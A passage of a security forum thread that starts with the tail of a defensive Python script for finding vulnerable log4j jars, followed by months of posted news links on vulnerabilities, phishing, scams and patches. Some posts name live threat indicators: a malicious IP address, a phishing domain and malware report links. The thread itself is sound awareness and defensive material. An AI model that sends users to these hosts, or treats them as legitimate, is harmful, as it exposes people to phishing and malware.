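    src = io.BytesIO(data) if data is not None else path
    try:
        with zipfile.ZipFile(src) as zf:
            names = set(zf.namelist())
            if not any(n.startswith(CORE_PREFIX) for n in names):
                return None
            version = version_from_manifest(zf)
            if version is None:
                m = NAME_RE.search(os.path.basename(path))
                version = parse_version(m.group(0)) if m else None
            has_jndi = JNDI_LOOKUP_CLASS in names
    except zipfile.BadZipFile:
        return None
    return Finding(path, version, has_jndi, assess(version, has_jndi))


def scan(root: str) -> List[Finding]:
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                f = inspect_jar(os.path.join(dirpath, name))
                if f is not None:
                    findings.append(f)
    return findings


def make_jar(version: Optional[str], include_jndi: bool) -> bytes:
    """Constructed minimal jar for demonstration only; not a real log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr("META-INF/MANIFEST.MF",
                        "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        zf.writestr(CORE_PREFIX + "Core.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    for fnd in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(fnd.path, fnd.version, fnd.verdict)
```

Run it as `python log4j_inventory.py /opt/app` (the file name is the reader's choice). Shaded or renamed jars are caught because the check keys on the `org/apache/logging/log4j/core/` entries rather than the file name; a jar whose version cannot be read is reported for manual review rather than silently passed.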
-
6 Things in Cybersecurity We Didn’t Know Last Year
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/29/19/17/crlUqbVoe4t/preview.jpg)
https://youtu.be/rrcoZLGZ1YY
Let’s look back at the year that’s been, and what we’ve learned along the way.
Thanks to TechCrunch for their excellent insight.
https://techcrunch.com/2021/12/29/six-things-we-learned-cybersecurity/
-
Weekly Security News Roundup w/e 12-31-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/31/13/26/crlwIOVo1aD/preview.jpg)
https://youtu.be/0m45tcQEL74
A recap of the weekly episodes created during 2021
-
Netgear leaves vulnerabilities unpatched in Nighthawk router
https://www.bleepingcomputer.com/news/security/netgear-leaves-vulnerabilities-unpatched-in-nighthawk-router/
https://www.tenable.com/security/research/tra-2021-57
-
Microsoft Exchange year 2022 bug in FIP-FS breaks email delivery
https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-year-2022-bug-in-fip-fs-breaks-email-delivery/
-
Microsoft Exchange year 2022 bug in FIP-FS breaks email delivery
https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-year-2022-bug-in-fip-fs-breaks-email-delivery/
Microsoft releases emergency fix for Exchange year 2022 bug
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fix-for-exchange-year-2022-bug/
-
FBI warns about ongoing Google Voice authentication scams
https://www.bleepingcomputer.com/news/security/fbi-warns-about-ongoing-google-voice-authentication-scams/
-
Weekly Security News Roundup w/e 1-7-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/07/13/55/c3ViINVortH/preview.jpg)
https://youtu.be/GVgo529gfWI
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Caution - Malware-Filled USB Sticks
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/09/22/21/c3VQ3rVoTTA/preview.jpg)
https://youtu.be/eo0UXNI35nA
The hacking group FIN7 has gone to great lengths to make their parcels appear innocuous.
-
KCodes NetUSB bug exposes millions of routers to RCE attacks
https://www.bleepingcomputer.com/news/security/kcodes-netusb-bug-exposes-millions-of-routers-to-rce-attacks/
-
Watch Out for Wordle Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/12/19/04/c3VlqfVoalW/preview.jpg)
https://youtu.be/0zqgzqVVTnM
The popular word-guessing game has inspired ad-filled copycats and other scams
on iPhone and Android.
-
New Windows Server updates cause DC boot loops, break Hyper-V
https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/
New Windows KB5009543, KB5009566 updates break L2TP VPN connections
https://www.bleepingcomputer.com/news/microsoft/new-windows-kb5009543-kb5009566-updates-break-l2tp-vpn-connections/
-
Microsoft Defender weakness lets hackers bypass malware detection
https://www.bleepingcomputer.com/news/security/microsoft-defender-weakness-lets-hackers-bypass-malware-detection/
-
Weekly Security News Roundup w/e 1-14-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/14/14/40/c3V22kVop1g/preview.jpg)
https://youtu.be/hpmwKLRx6yE
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Malicious QR codes found in Austin
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/14/20/57/c3V2YPVoCbn/preview.jpg)
https://youtu.be/th--omyQgxo
QR codes started popping up everywhere. Be cautious how you use them.
Thanks to Emma McGowan for her excellent article on this topic.
https://blog.avast.com/author/emma-mcgowan
-
Beware of a new and dangerous RDP exploit
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/17/18/26/c3VbFOVoHR6/preview.jpg)
https://youtu.be/l_9OAVepuGM
This has affected all versions of Windows for the past 10 years –
for both desktop and servers.
Be sure to read David Strom’s full article on this
very important topic. Just follow the link below.
https://blog.avast.com/beware-of-new-rdp-exploit-avast
-
New Windows Server updates cause DC boot loops, break Hyper-V
https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/
New Windows KB5009543, KB5009566 updates break L2TP VPN connections
https://www.bleepingcomputer.com/news/microsoft/new-windows-kb5009543-kb5009566-updates-break-l2tp-vpn-connections/
Microsoft releases emergency fixes for Windows Server, VPN bugs
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/
-
1-18-2022 Security News Flash - Apple's Safari leaking your browsing data
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/18/20/17/c3VFYbVo7mS/preview.jpg)
https://youtu.be/kjm-9aSaez0
A new Safari bug has been discovered in iOS, iPadOS, and Mac.
Read the full story at:
https://www.howtogeek.com/780428/apples-safari-is-leaking-your-browsing-data/
-
Chrome Users Beware: Manifest V3 is Deceitful and Threatening
https://www.eff.org/deeplinks/2021/12/chrome-users-beware-manifest-v3-deceitful-and-threatening
Note: I reposted the info/article here per request (via PM) from Bob. :)
-
WordPress plugin flaw puts users of 20,000 sites at phishing risk
https://www.bleepingcomputer.com/news/security/wordpress-plugin-flaw-puts-users-of-20-000-sites-at-phishing-risk/
-
Weekly Security News Roundup w/e 1-21-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/21/13/14/c3VrI2VoWOb/preview.jpg)
https://youtu.be/_tcOtrDTzoI
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Two troubling headlines.
The first one affects those using McAfee.
McAfee Agent bug lets hackers run code with Windows SYSTEM privileges
https://www.bleepingcomputer.com/news/security/mcafee-agent-bug-lets-hackers-run-code-with-windows-system-privileges/
The second one affects those using Windows Defender (Windows Security).
Microsoft Defender weakness lets hackers bypass malware detection
https://www.bleepingcomputer.com/news/security/microsoft-defender-weakness-lets-hackers-bypass-malware-detection/
-
WordPress sites may be vulnerable to a backdoor in AccessPress Themes:
https://jetpack.com/2022/01/18/backdoor-found-in-themes-and-plugins-from-accesspress-themes/
polonus
-
FBI warns of malicious QR codes used to steal your money
https://www.bleepingcomputer.com/news/security/fbi-warns-of-malicious-qr-codes-used-to-steal-your-money/
-
FBI warns of malicious QR codes used to steal your money
https://www.bleepingcomputer.com/news/security/fbi-warns-of-malicious-qr-codes-used-to-steal-your-money/
Malicious QR codes found in Austin.
https://youtu.be/th--omyQgxo
-
Apple fixes new zero-day exploited to hack macOS, iOS devices
https://www.bleepingcomputer.com/news/apple/apple-fixes-new-zero-day-exploited-to-hack-macos-ios-devices/
-
Weekly Security News Roundup w/e 1-28-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/28/14/27/c3Vu2tVDYkZ/preview.jpg)
https://youtu.be/C60R9Kw-fIM
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Social media scammers stole at least $770 million in 2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/28/22/40/c3Vu3kVD3Q1/preview.jpg)
https://youtu.be/agQ7pzxIYNU
Scams originating on social media have 'soared,' according to a new report from the FTC.
For full details, see the article on engadget. https://engt.co/3s29huz
-
1-29-2022 Security News Flash -
Another Crypto Platform Hacked, $80 Million Stolen
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/29/18/49/c3VUFdVD0O5/preview.jpg)
https://youtu.be/2CFuu_-AFuI
A decentralized finance platform called Qubit was attacked,
and its users lost around $80 million in cryptocurrency.
Detail at How-To Geek: https://bit.ly/3rUyy9W
-
Windows vulnerability with new public exploits lets you become admin
https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/
-
Do you report spam/scam-mail?
For instance, the Wing Ying -cjdropshipper dot com spam email?
Re: https://stopscamfraud.com/viewtopic.php?f=26&t=23348&view=previous
also: https://419scam.org/emails/2022-01/04/02115157.92.htm
polonus
-
German govt warns of APT27 hackers backdooring business networks
https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/
-
600K WordPress sites impacted by critical plugin RCE vulnerability
https://www.bleepingcomputer.com/news/security/600k-wordpress-sites-impacted-by-critical-plugin-rce-vulnerability/
-
What's the deal with Google Topics?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/01/13/23/c3nVI0VDv8l/preview.jpg)
https://youtu.be/DFfF5oGfb1M
At first glance, this initiative seems like a win for privacy advocates,
as it gives more control to the users.
Read Joe Bosso’s full article on this topic on the Avast Blog:
https://blog.avast.com/google-topics-avast
-
FBI warns of fake job postings used to steal money, personal info
https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-job-postings-used-to-steal-money-personal-info/
-
Stolen Netflix accounts
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/03/15/45/c3neoGVDBNk/preview.jpg)
https://youtu.be/Lbl-TZkyPRY
How did this happen – and what can you do about it if this happens to you?
Thanks to Luis Corrons for his advice
https://blog.avast.com/author/luis-corrons
and to Laura Josepha Zimmermann for this information.
https://blog.avast.com/author/laura-josepha-zimmermann
-
Weekly Security News Roundup w/e 2-4-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/05/15/43/c3nho5VDEJB/preview.jpg)
https://youtu.be/-ByEqdesEjk
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
PHP Everywhere RCE flaws threaten thousands of WordPress sites
https://www.bleepingcomputer.com/news/security/php-everywhere-rce-flaws-threaten-thousands-of-wordpress-sites/
-
Weekly Security News Roundup w/e 2-11-2022
https://youtu.be/L1y8YbFYlAw
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Payback is Sweet Revenge
https://youtu.be/8mvD7f86ey0
“If they don’t see we have teeth, it’s just going to keep coming.”
Read the full article at:
https://www.wired.com/story/north-korea-hacker-internet-outage/
-
Thousands of npm packages have outdated domain-name weak links and can be hijacked.
https://arxiv.org/abs/2112.10165
pol
-
Weekly Security News Roundup w/e 2-18-2022
https://youtu.be/WR5I9C9EX3I
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Delete Your Old Online Accounts Now
https://youtu.be/sBVm8ckhw2E
You’ve probably signed up for a lot of online services that you no longer use. I know I have.
Don’t leave juicy targets lying around for hackers or attackers. Thanks to Chris Hoffman:
https://www.howtogeek.com/author/chrishoffman/ for his excellent article in How-To Geek:
https://www.howtogeek.com/714981/how-to-delete-your-old-online-accounts-and-why-you-should/
on this very important topic.
-
What happens to my data when I get tested for Covid?
https://youtu.be/ig-TkkPJ74Y
The biggest question most people have about Covid data is
where their vaccine information is stored.
The answer, unfortunately, isn’t as straightforward as you might think.
Thanks to Emma McGowan for her excellent article on this topic.
https://bit.ly/3BI0FOf
-
Scam email campaign masquerading as Avast sales team
https://youtu.be/fyIYD3HlzGU
Avast has become aware of an email scam campaign purporting to be from our sales team.
https://blog.avast.com/fake-avast-email-scam-avast
-
Weekly Security News Roundup w/e 2-25-2022
https://youtu.be/MV5VNRsFTS0
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Avast warns users of crypto scams
taking advantage of Ukraine conflict
https://youtu.be/V5edmrjSEsc
Avast security experts have detected scammers pretending to be Ukrainian nationals
affected by the current conflict asking for Bitcoin on social media.
-
If you receive one of these in your inbox,
put it in the trash where it belongs.
<snip image>
Especially when it's sent to you via a Gmail address:
<snip image>
-
Avast ThreatLabs warns against joining
in DDOS attacks in aid of Ukraine
https://youtu.be/ViJNysn3oPI
"Simple tools" allow regular people to participate in DDOS attacks in aid of Ukraine.
But these tools are not safe, say Avast ThreatLabs researchers.
-
Hundreds of eBike phishing sites abuse Google Ads to push scams
https://www.bleepingcomputer.com/news/security/hundreds-of-ebike-phishing-sites-abuse-google-ads-to-push-scams/
-
Weekly Security News Roundup w/e 3-4-2022
https://youtu.be/pHdFNPR9oiA
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Malware now using stolen NVIDIA code signing certificates
https://www.bleepingcomputer.com/news/security/malware-now-using-stolen-nvidia-code-signing-certificates/
-
Malware now using stolen NVIDIA code signing certificates
https://www.bleepingcomputer.com/news/security/malware-now-using-stolen-nvidia-code-signing-certificates/
Apparently Lapsus$ is also responsible for stealing almost 200 GB of
sensitive data from Samsung. They've been busy.
https://www.engadget.com/samsung-lapsus-leak-181517961.html?src=rss
-
DDoS hacktivism: A highly risky exercise
https://blog.avast.com/ddos-hacktivism-avast
-
DDoS hacktivism: A highly risky exercise
https://blog.avast.com/ddos-hacktivism-avast
https://youtu.be/ViJNysn3oPI
-
FBI: Govt officials impersonated in widespread extortion schemes
https://www.bleepingcomputer.com/news/security/fbi-govt-officials-impersonated-in-widespread-extortion-schemes/
-
HP patches 16 UEFI firmware bugs allowing stealthy malware infections
https://www.bleepingcomputer.com/news/security/hp-patches-16-uefi-firmware-bugs-allowing-stealthy-malware-infections/
-
CISA updates Conti ransomware alert with nearly 100 domain names
https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/
-
Threat advisory: Cybercriminals compromise users with malware disguised as pro-Ukraine cyber tools
https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html
-
Weekly Security News Roundup w/e 3-11-2022
https://youtu.be/P2j7T1_Ec6g
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
So, this just arrived in my in-box
<snip image>
Now I know this is a scam and probably a phishing attempt.
Considering the high prices of food and gas, there are many
who look at this and say "Oh good, I can use a helping hand."
They may very well be tempted to click on that tempting link to
Check what you won
Don't do it regardless of how much help you may need.
This will only make things worse not better.
Do what I did with this email,
<snip image> Report it as SPAM
-
So, this just arrived in my in-box
<snip image>
Now I know this is a scam and probably a phishing attempt.
Considering the high prices of food and gas, there are many
who look at this and say "Oh good, I can use a helping hand."
They may very well be tempted to click on that tempting link to
Check what you won
Don't do it regardless of how much help you may need.
This will only make things worse not better.
Do what I did with this email,
<snip image> Report it as SPAM
I get stuff like this, some supposedly from a popular financial advice and deals guy, but he doesn't do anything like this; many will just see the name and dumbly open it to see what it is about. I also get some supposedly having come from Microsoft; there are just too many scams/phishing attempts out there.
I use MailWasherPro; it downloads a very small part of the email (in plain text), and it can be set to use SpamCop, SpamHaus and other vetting tools, so it is a very effective vetting process. At the end of the vetting and my own decisions, I have it open my email client and I download the remainder.
-
QNAP warns severe Linux bug affects most of its NAS devices
https://www.bleepingcomputer.com/news/security/qnap-warns-severe-linux-bug-affects-most-of-its-nas-devices/
-
Emotet Spoofs IRS in Tax Season-Themed Phishing Campaign
https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/
-
Emotet Spoofs IRS in Tax Season-Themed Phishing Campaign
https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/
Emotet Spoofs IRS in Tax Season-Themed Phishing Campaign
https://youtu.be/dUocIALEzwk
It’s Tax Season again and Emotet is looking to cash in. Don’t become the victim!
For more on this topic see Cofense.com.
https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/
-
Weekly Security News Roundup w/e 3-18-2022
https://youtu.be/dK_d-gUIM0c
Security-related news thanks this week to cybernews.
https://cybernews.com/news/
-
Cyber threats and the Ukraine conflict
https://youtu.be/m4ONgmR8YxY
A rundown of cyber threats emerging from the Russian invasion of Ukraine.
https://blog.avast.com/cyber-threats-and-the-ukraine-conflict-avast
Cyber threats usually inflict a financial toll which is terrible and needs to end.
The unprovoked attack on the people of Ukraine is killing innocent men, women,
children, and animals.
It’s reducing the cities to rubble and destroying a people's way of life.
This must stop and it must stop NOW.
-
Windows zero-day flaw giving admin rights gets unofficial patch, again
https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/
-
Hundreds of HP printer models vulnerable to remote code execution
https://www.bleepingcomputer.com/news/security/hundreds-of-hp-printer-models-vulnerable-to-remote-code-execution/
-
Weekly Security News Roundup w/e 3-25-2022
https://youtu.be/pXkE4fPWinc
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Emergency Google Chrome update fixes zero-day used in attacks
https://www.bleepingcomputer.com/news/security/emergency-google-chrome-update-fixes-zero-day-used-in-attacks/
-
Wyze Cam flaw lets hackers remotely access your saved videos
https://www.bleepingcomputer.com/news/security/wyze-cam-flaw-lets-hackers-remotely-access-your-saved-videos/
-
Wyze Cam flaw lets hackers remotely access your saved videos
https://www.bleepingcomputer.com/news/security/wyze-cam-flaw-lets-hackers-remotely-access-your-saved-videos/
Is old news like this really helpful or just designed to grab headlines?
Those using the camera have long since applied the update that's been available
since Nov. 2020.
The first version of the camera that was not patched reached its end of life in 2020.
-
QNAP warns severe OpenSSL bug affects most of its NAS devices
https://www.bleepingcomputer.com/news/security/qnap-warns-severe-openssl-bug-affects-most-of-its-nas-devices/
-
Apple emergency update fixes zero-days used to hack iPhones, Macs
https://www.bleepingcomputer.com/news/security/apple-emergency-update-fixes-zero-days-used-to-hack-iphones-macs/
-
Weekly Security News Roundup w/e 4-1-2022
https://youtu.be/7vTHHncwdh4
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Justice Department Announces Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate (GRU)
https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation
https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html
https://detection.watchguard.com/
-
Weekly Security News Roundup w/e 4-8-2022
https://youtu.be/1TNfN_iYqII
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Yandex is causing data privacy concerns for mobile users
https://youtu.be/PsKogYyuFQ0
In this matter, the user's trust is ultimately put into the app developers' hands.
The real question is who to trust.
See the full article at: https://blog.avast.com/yandex-and-data-privacy
-
Critical HP Teradici PCoIP flaws impact 15 million endpoints
https://www.bleepingcomputer.com/news/security/critical-hp-teradici-pcoip-flaws-impact-15-million-endpoints/
-
Critical HP Teradici PCoIP flaws impact 15 million endpoints
https://www.bleepingcomputer.com/news/security/critical-hp-teradici-pcoip-flaws-impact-15-million-endpoints/
To address all of the issues, users are urged to update to version 22.01.3 or later,
which uses OpenSSL 1.1.1n and libexpat 2.4.7.
HP released the security updates on April 4 and 5, 2022, so you are secure if you have
already updated Teradici since then.
-
Warning: Did You Install the Play Store on Windows 11? Read This Now
https://www.howtogeek.com/797298/warning-did-you-install-the-play-store-on-windows-11-read-this-now/
-
Warning: Did You Install the Play Store on Windows 11? Read This Now
https://www.howtogeek.com/797298/warning-did-you-install-the-play-store-on-windows-11-read-this-now/
That should teach folks a lesson.
Install from a reputable site like Microsoft when it comes to things like the Microsoft Store
which is part of Windows.
When you play with fire, you wind up getting burned.
-
Critical flaw in Elementor WordPress plugin may affect 500k sites
https://www.bleepingcomputer.com/news/security/critical-flaw-in-elementor-wordpress-plugin-may-affect-500k-sites/
https://www.pluginvulnerabilities.com/2022/04/12/5-million-install-wordpress-plugin-elementor-contains-authenticated-remote-code-execution-rce-vulnerability/
-
More threats to PHP-driven CMS like WordPress and Magento (CMS = Content Management Software).
A critical hole could infest: https://helpx.adobe.com/security/products/magento/apsb22-13.html
So scan your webshop website here: https://www.magereport.com/
WordPress websites can be hacked by mere Let's Encrypt logs:
https://www.whitefirdesign.com/blog/2022/04/11/fresh-installs-of-wordpress-apparently-being-hacked-based-on-public-disclosure-from-lets-encrypt/
Maybe all CT logs could be involved; see the various CT logs at https://crt.sh/monitored-logs
polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
-
FBI: Payment app users targeted in social engineering attacks
https://www.bleepingcomputer.com/news/security/fbi-payment-app-users-targeted-in-social-engineering-attacks/
-
Google Chrome emergency update fixes zero-day used in attacks
https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-zero-day-used-in-attacks/
-
Weekly Security News Roundup w/e 4-15-2022
https://youtu.be/lJ7-itqEDlU
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
T-Mobile customers warned of unblockable SMS phishing attacks
https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/
-
T-Mobile customers warned of unblockable SMS phishing attacks
https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/
Security News Flash - T-Mobile warning of unblockable SMS phishing attacks
https://youtu.be/ocaaaC0aJjM
The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) issued
a warning after multiple customers have filed reports of being targeted by this
new SMS phishing (smishing) campaign. Read more at
https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/
-
Enemybot could develop from a DDoS bot into ransomware malware.
Re: https://urlhaus.abuse.ch/browse.php?search=enemybot
Re: https://www.abuseipdb.com/check/198.12.116.254
and https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/
Also this analysis: https://any.run/report/b0411b4c908566c6bdcb8c9fdd544d1c624103f32357c86350cdc157f1c1d6e8/7df4bece-43b2-4eab-9e59-31cc16d7d734
cracked software download here detected (by community reporting): https://www.virustotal.com/gui/url/a38345f1d6fa09755f147678f7ee0c248ad8d70a9c8c7a0bf51d1e48234ddfa4/community (reported as: Malicious chrome extension download from crack files).
polonus (volunteer cold recon website security-analyst and website error-hunter)
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/
I personally don't like to delete files.
I simply renamed the 7-zip.chm file to 7-zip.mhc
The file remains but the program can no longer access the file.
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/
I personally don't like to delete files.
I simply renamed the 7-zip.chm file to 7-zip.mhc
The file remains but the program can no longer access the file.
Well, I just deleted the help file, never read/needed it anyway. ;)
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/
I personally don't like to delete files.
I simply renamed the 7-zip.chm file to 7-zip.mhc
The file remains but the program can no longer access the file.
Well, I just deleted the help file, never read/needed it anyway. ;)
I haven't used it either, but I have left it in place and renamed as bob3160 did.
-
Office fraud and phish @-office-1010-online.azurewebsites.net
Re: https://maltiverse.com/url/fba6686783dc3e37307905e468416f1a8f7489a1b4479ec7148c6977b8136f5b
8 security vendors detect: https://www.virustotal.com/gui/url/87b44887d59dbf2df065ef78cb0aa0277d5561c704f985a80b6eba013a57b187/details
polonus
-
Unofficial Windows 11 upgrade installs info-stealing malware
https://www.bleepingcomputer.com/news/security/unofficial-windows-11-upgrade-installs-info-stealing-malware/
-
These apps won’t let you quit them unless you pay up or figure out their tricks
https://www.theverge.com/2022/4/15/23027363/apple-scammy-apps-mac-app-store-moderation
-
New 7-Zip Archiver Hack Reveals a long-Ignored
Windows Vulnerability
https://youtu.be/sIaZUuqy2n0
The latest versions of 7-Zip contain a vulnerability (CVE-2022-29072) that lets hackers
gain administrative privileges on a system.
But this vulnerability, which exploits the 7-Zip help file, should alarm all Windows users,
as it highlights an age-old problem on Windows systems.
You’ll find Andrew Heinzman’s excellent article on this topic at the following link:
https://www.reviewgeek.com/115336/new-7-zip-archiver-hack-reveals-a-long-ignored-windows-vulnerability/
-
But this vulnerability, which exploits the 7-Zip help file, should alarm all Windows users, as it highlights an age-old problem on Windows systems.
So, it's up to MS to fix this issue. Let's see...
-
Tech support scams targeting seniors on the rise
https://youtu.be/v4DXc5geQpQ
Tech support scammers target older people because they believe them
to be more trusting and they tend to be more financially secure than younger people.
Read Emma McGowan’s excellent article by following the link below:
https://blog.avast.com/tech-support-scams-targeting-seniors
Watch what happened to Phyllis by watching her video.
https://youtu.be/ar2MOvn2aDc
-
Weekly Security News Roundup w/e 4-22-2022
https://youtu.be/sHWuENKxr18
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
QNAP warns users to disable AFP until it fixes critical bugs
https://www.bleepingcomputer.com/news/security/qnap-warns-users-to-disable-afp-until-it-fixes-critical-bugs/
-
Synology warns of critical Netatalk bugs in multiple products
https://www.bleepingcomputer.com/news/security/synology-warns-of-critical-netatalk-bugs-in-multiple-products/
-
Weekly Security News Roundup w/e 4-29-2022
https://youtu.be/IRt2pufRkYY
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Fake Windows 10 updates infect you with Magniber ransomware
https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/
-
Fake Windows 10 updates infect you with Magniber ransomware
https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/
If you get your updates from any place other than this,
<snip image>
you probably deserve the infection.
-
Google SMTP relay service abused for sending phishing emails
https://www.bleepingcomputer.com/news/security/google-smtp-relay-service-abused-for-sending-phishing-emails/
-
New phishing warns: Your verified Twitter account may be at risk
https://www.bleepingcomputer.com/news/security/new-phishing-warns-your-verified-twitter-account-may-be-at-risk/
-
New phishing warns: Your verified Twitter account may be at risk
https://www.bleepingcomputer.com/news/security/new-phishing-warns-your-verified-twitter-account-may-be-at-risk/
Since Twitter is in the news, expect the hackers to jump on the opportunity.
Never give a sucker an even break has been their motto forever. :)
-
Allowing too many exceptions leaves you wide open to infection
https://blog.avast.com/exceptions-risks
-
Allowing too many exceptions leaves you wide open to infection
https://blog.avast.com/exceptions-risks
https://youtu.be/Dt_ZEBguelE
-
SECURITY ALERT: Active Golang-Written Botnet StealthWorker Infects Thousands of Websites via Distributed Brute-Force Attacks
https://heimdalsecurity.com/blog/security-alert-botnet-stealthworker/
-
Weekly Security News Roundup w/e 5-6-2022
https://youtu.be/tlZZ0FrPTkU
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/
I can't believe those who believe you can get something for nothing - I can't remember when I was first told about it - if it seems to be too good to be true then it most likely isn't.
But greed is a powerful thing.
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/
I can't believe those who believe you can get something for nothing - I can't remember when I was first told about it - if it seems to be too good to be true then it most likely isn't.
But greed is a powerful thing.
My offer to sell the Brooklyn Bridge is still on the table.
<snip image>
I'm selling it really cheap. Look at all the money you can make from the tolls. :)
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/
I can't believe those who believe you can get something for nothing - I can't remember when I was first told about it - if it seems to be too good to be true then it most likely isn't.
But greed is a powerful thing.
My offer to sell the Brooklyn Bridge is still on the table.
I'm selling it really cheap. Look at all the money you can make from the tolls. :)
;D 8)
-
This victim had his life savings stolen in a crypto romance scam
https://blog.avast.com/crypto-romance-scams
-
HP fixes bug letting attackers overwrite firmware in over 200 models
https://www.bleepingcomputer.com/news/security/hp-fixes-bug-letting-attackers-overwrite-firmware-in-over-200-models/
-
Weekly Security News Roundup w/e 5-13-2022
